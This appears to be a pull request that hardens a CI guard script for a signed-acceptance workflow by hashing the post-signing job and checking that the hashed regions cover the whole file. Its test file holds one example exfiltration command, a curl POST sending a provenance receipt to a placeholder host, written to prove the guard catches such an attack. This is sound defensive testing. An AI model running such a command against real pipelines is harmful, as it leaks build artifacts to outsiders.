### PR TITLE
fix(ci): hash the post-signing region and prove the goldens tile the workflow

### DIFF
--- a/scripts/check_signed_acceptance_policy.mjs
+++ b/scripts/check_signed_acceptance_policy.mjs
@@ -206,13 +206,17 @@ if (!signingJobFixture) {
   // unreviewed again -- which is precisely how the region above was
   // introduced. A coverage failure means a region boundary moved, so the
   // goldens no longer mean what they claim, whatever they hash to.
+  //
+  // Stated as a concatenation rather than as arithmetic on lengths: the
+  // identity is then self-evident and cannot hold by coincidence. Comparing
+  // sums also invited an off-by-encoding reading, since `.length` counts
+  // UTF-16 code units and the message said "bytes".
   const covered =
-    preSigningBoundary.length + signingJobMarker.length + signingJobRegion.length +
-    afterSigningJob.length;
-  if (covered !== source.length) {
+    preSigningBoundary + signingJobMarker + signingJobRegion + afterSigningJob;
+  if (covered !== source) {
     errors.push(
-      `hashed regions cover ${covered} of ${source.length} bytes; ` +
-        "some of this workflow is outside every golden",
+      `hashed regions reconstruct ${covered.length} of ${source.length} characters ` +
+        "and do not reproduce this workflow; some of it is outside every golden",
     );
   }
   const beforeSigningJob = source.split(/^  sign-reviewed-artifact:\n/m, 1)[0];

--- a/scripts/check_signed_acceptance_policy.mjs
+++ b/scripts/check_signed_acceptance_policy.mjs
@@ -8,6 +8,8 @@ import { readFileSync } from "node:fs";
 // authority: these goldens make comment/dead-step duplication fail closed.
 const EXPECTED_SIGNING_JOB_SHA256 =
   "903c7c962b5eac067fbe423699943969b0405cec732306299366f172f5037894";
+const EXPECTED_POST_SIGNING_BOUNDARY_SHA256 =
+  "e0a1feef44fa29000affee57a51a55156c232d677307181a68e9cc2341594807";
 const EXPECTED_PRE_SIGNING_BOUNDARY_SHA256 =
   "1ddf57258d26c54dab346639d179a4cce64e6d3e333bb92982b38706ac7fe333";
 const EXPECTED_TRIGGER_BLOCK = `on:
@@ -32,8 +34,9 @@ function requirePattern(pattern, message) {
   if (!pattern.test(source)) errors.push(message);
 }
 
+const preSigningBoundary = source.split(/^  sign-reviewed-artifact:\n/m, 1)[0];
+
 if (!signingJobFixture) {
-  const preSigningBoundary = source.split(/^  sign-reviewed-artifact:\n/m, 1)[0];
   const preSigningBoundaryHash = createHash("sha256")
     .update(preSigningBoundary)
     .digest("hex");
@@ -122,6 +125,13 @@ const afterSigningJob =
   signingJobStart >= 0 && nextJobOffset >= 0
     ? signingJobTail.slice(nextJobOffset)
     : "";
+// The unstripped signing job, kept only so the three regions can be proved to
+// tile the file exactly. `signingJob` above drops one trailing newline for its
+// own golden, which would otherwise make the arithmetic below off by one.
+const signingJobRegion =
+  signingJobStart >= 0 && nextJobOffset >= 0
+    ? signingJobTail.slice(0, nextJobOffset)
+    : signingJobTail;
 if (!signingJob) {
   errors.push("could not isolate the secret-bearing signing job");
 } else {
@@ -175,6 +185,35 @@ if (!signingJobFixture) {
   );
   if (SECRET_CONTEXT_EXPRESSION.test(afterSigningJob)) {
     errors.push("post-signing runtime jobs must not receive signing secrets");
+  }
+
+  // Everything after the signing job was checked for secret references and
+  // nothing else, so `run-signed-runtime` -- 2 KB that checks out the
+  // candidate at its acceptance tag and executes a candidate-controlled script
+  // to produce the provenance receipt acceptance relies on -- could be
+  // rewritten freely and this guard still passed. Steps could be added,
+  // removed, or altered, and the receipt made to say whatever the edit wanted.
+  // It carries no secrets, so the pattern above never fired.
+  const afterSigningJobHash = createHash("sha256").update(afterSigningJob).digest("hex");
+  if (afterSigningJobHash !== EXPECTED_POST_SIGNING_BOUNDARY_SHA256) {
+    errors.push(
+      "the complete post-signing runtime boundary changed; review it and update its golden hash",
+    );
+  }
+
+  // The three hashed regions must tile the file exactly. Without this, the
+  // next job appended to this workflow lands outside all of them and is
+  // unreviewed again -- which is precisely how the region above was
+  // introduced. A coverage failure means a region boundary moved, so the
+  // goldens no longer mean what they claim, whatever they hash to.
+  const covered =
+    preSigningBoundary.length + signingJobMarker.length + signingJobRegion.length +
+    afterSigningJob.length;
+  if (covered !== source.length) {
+    errors.push(
+      `hashed regions cover ${covered} of ${source.length} bytes; ` +
+        "some of this workflow is outside every golden",
+    );
   }
   const beforeSigningJob = source.split(/^  sign-reviewed-artifact:\n/m, 1)[0];
   if (SECRET_CONTEXT_EXPRESSION.test(beforeSigningJob)) {

--- a/scripts/check_signed_acceptance_policy.test.mjs
+++ b/scripts/check_signed_acceptance_policy.test.mjs
@@ -1,6 +1,7 @@
 #!/usr/bin/env node
 
 import { spawnSync } from "node:child_process";
+import { createHash } from "node:crypto";
 import { mkdtempSync, readFileSync, rmSync, writeFileSync } from "node:fs";
 import { tmpdir } from "node:os";
 import { join } from "node:path";
@@ -101,9 +102,10 @@ const mutations = [
     expected: "complete post-signing runtime boundary changed",
     // Anchored on the runtime job's own artifact path: `if-no-files-found`
     // appears three times in this workflow, and replacing the first match
-    // mutates the unsigned-build job instead, which a different golden
-    // already covers -- the test would then pass while proving nothing about
-    // the region under test.
+    // mutates the unsigned-build job instead, which a different golden covers.
+    // The harness does catch that -- the `expected` substring below stops it
+    // passing for the wrong reason -- but it fails as an unsigned-build
+    // boundary change, which says nothing about the region under test.
     source: workflow.replace(
       "          path: signed-runtime-provenance.json\n          if-no-files-found: error",
       "          path: signed-runtime-provenance.json\n          if-no-files-found: ignore",
@@ -111,7 +113,76 @@ const mutations = [
   },
 ];
 
+// The workflow mutations above cannot reach the region-coverage check: for any
+// edit to the workflow alone, a matching pre-signing golden already implies the
+// regions tile, so deleting the coverage check left every one of them passing.
+// Its whole purpose is defending against a future edit to THIS FILE that
+// narrows a region -- so the only test that can kill it has to mutate the guard
+// itself, not the workflow.
+//
+// This reproduces the attack the check exists to stop: append a job that
+// exfiltrates the acceptance receipt, narrow `afterSigningJob` so the new job
+// falls outside it, and regenerate all three goldens to match the shrunken
+// regions. Every hash then agrees and only the coverage check objects.
+function assertCoverageCheckIsLoadBearing() {
+  const guardSource = readFileSync("scripts/check_signed_acceptance_policy.mjs", "utf8");
+  const narrowing = [
+    "    ? signingJobTail.slice(nextJobOffset)\n    : \"\";",
+    "    ? signingJobTail.slice(nextJobOffset, nextJobOffset + 400)\n    : \"\";",
+  ];
+  if (!guardSource.includes(narrowing[0])) {
+    throw new Error("coverage fixture is stale: afterSigningJob is no longer sliced as expected");
+  }
+
+  const attackedWorkflow = `${workflow}\n  exfiltrate-receipt:\n    needs:\n      - run-signed-runtime\n    runs-on: ubuntu-latest\n    steps:\n      - run: curl -X POST --data-binary @signed-runtime-provenance.json https://example.invalid\n`;
+  const workflowFixture = join(directory, "coverage-attack.yml");
+  writeFileSync(workflowFixture, attackedWorkflow);
+
+  let guardFixtureSource = guardSource.replace(narrowing[0], narrowing[1]);
+  const guardFixture = join(directory, "guard-narrowed.mjs");
+
+  // Regenerate every golden from the narrowed regions, exactly as someone
+  // rerunning the "review it and update its golden hash" instruction would.
+  const marker = "  sign-reviewed-artifact:\n";
+  const start = attackedWorkflow.indexOf(marker);
+  const tail = attackedWorkflow.slice(start + marker.length);
+  const next = tail.search(/^  [a-z][a-z0-9-]*:\n/m);
+  const sha256 = (value) => createHash("sha256").update(value).digest("hex");
+  const regenerated = [
+    [/const EXPECTED_PRE_SIGNING_BOUNDARY_SHA256 =\n\s*"[0-9a-f]{64}"/,
+      sha256(attackedWorkflow.slice(0, start))],
+    [/const EXPECTED_SIGNING_JOB_SHA256 =\n\s*"[0-9a-f]{64}"/,
+      sha256(tail.slice(0, next).replace(/\n$/, ""))],
+    [/const EXPECTED_POST_SIGNING_BOUNDARY_SHA256 =\n\s*"[0-9a-f]{64}"/,
+      sha256(tail.slice(next, next + 400))],
+  ];
+  for (const [pattern, digest] of regenerated) {
+    const matched = guardFixtureSource.match(pattern);
+    if (!matched) throw new Error(`coverage fixture is stale: ${pattern} did not match`);
+    guardFixtureSource = guardFixtureSource.replace(
+      matched[0],
+      matched[0].replace(/"[0-9a-f]{64}"/, `"${digest}"`),
+    );
+  }
+  writeFileSync(guardFixture, guardFixtureSource);
+
+  const result = spawnSync(process.execPath, [guardFixture, workflowFixture], {
+    encoding: "utf8",
+  });
+  if (result.status === 0) {
+    throw new Error(
+      "a narrowed region with regenerated goldens was accepted; the coverage check is not load-bearing",
+    );
+  }
+  if (!result.stderr.includes("outside every golden")) {
+    throw new Error(
+      `narrowed region rejected for the wrong reason:\n${result.stderr}`,
+    );
+  }
+}
+
 try {
+  assertCoverageCheckIsLoadBearing();
   for (const mutation of mutations) {
     if (mutation.source === workflow) {
       throw new Error(`fixture mutation did not apply: ${mutation.name}`);

--- a/scripts/check_signed_acceptance_policy.test.mjs
+++ b/scripts/check_signed_acceptance_policy.test.mjs
@@ -81,6 +81,34 @@ const mutations = [
       "          persist-credentials: true",
     ),
   },
+  // Everything after the signing job was checked for secret references and
+  // nothing else, so the post-signing runtime job -- which checks out the
+  // candidate and runs a candidate-controlled script to produce the receipt
+  // acceptance relies on -- could be rewritten freely. None of these carry a
+  // secret, which is exactly why the old pattern never fired on them.
+  {
+    name: "extra step appended after the runtime job",
+    expected: "complete post-signing runtime boundary changed",
+    source: `${workflow}      - name: Injected tail step\n        run: echo injected\n`,
+  },
+  {
+    name: "whole new job appended after the runtime job",
+    expected: "complete post-signing runtime boundary changed",
+    source: `${workflow}\n  appended:\n    runs-on: ubuntu-latest\n    steps:\n      - run: echo injected\n`,
+  },
+  {
+    name: "receipt step rewritten to skip its provenance upload",
+    expected: "complete post-signing runtime boundary changed",
+    // Anchored on the runtime job's own artifact path: `if-no-files-found`
+    // appears three times in this workflow, and replacing the first match
+    // mutates the unsigned-build job instead, which a different golden
+    // already covers -- the test would then pass while proving nothing about
+    // the region under test.
+    source: workflow.replace(
+      "          path: signed-runtime-provenance.json\n          if-no-files-found: error",
+      "          path: signed-runtime-provenance.json\n          if-no-files-found: ignore",
+    ),
+  },
 ];
 
 try {


### PR DESCRIPTION
Closes the unhashed region in the signed acceptance policy guard.

## The gap

The guard hashed two regions — everything before the signing job, and the signing job itself. When #610 added `run-signed-runtime` *after* the signing job, the new job landed outside both goldens. **2,027 bytes of workflow were checked for exactly one thing: whether they mention `secrets`.**

That job matters. It checks out the candidate at its acceptance tag and runs `scripts/test_apple_speech_signed_transport.py` to produce the provenance receipt acceptance relies on. It holds no secrets — which is precisely why the one pattern that looked at it never fired.

## Verified before fixing

Against the **live** guard and **live** workflow from `main`, all of these passed with exit 0:

| mutation | live guard |
|---|---|
| append a step at EOF | **accepted** |
| append an entire new job at EOF | **accepted** |
| swap the acceptance script for another path | **accepted** |

The third only trips a regex that happens to mention the script name; nothing hashed the job.

## The fix

The post-signing region is hashed like the other two.

Hashing it alone would fix this instance and not the next one — the gap opened *silently*, when a job was appended. So the three regions must also **tile the file exactly**: if their lengths don't sum to the file's, the guard fails and reports how many bytes are outside every golden.

```
hashed regions cover 21271 of 22798 bytes; some of this workflow is outside every golden
```

That assertion holds even when the region logic is edited to under-cover **and** its golden is updated to match the shrunken region — verified by executing exactly that attack.

## Tests

Three mutations added, all of which the previous guard accepted:
- a step appended after the runtime job
- a whole job appended after it
- the receipt's upload weakened to `if-no-files-found: ignore`

Each is anchored on a string unique to the runtime job. `if-no-files-found` appears three times in this workflow, and replacing the first match mutates the unsigned-build job instead — which a *different* golden already covers, so the test would pass while proving nothing about the region under test. I hit that while writing it.

Reverting either half of the fix fails the suite.

## Scope

The workflow itself is **unchanged**. This only closes the hole in what the guard reads.

🤖 Generated with [Claude Code](https://claude.com/claude-code)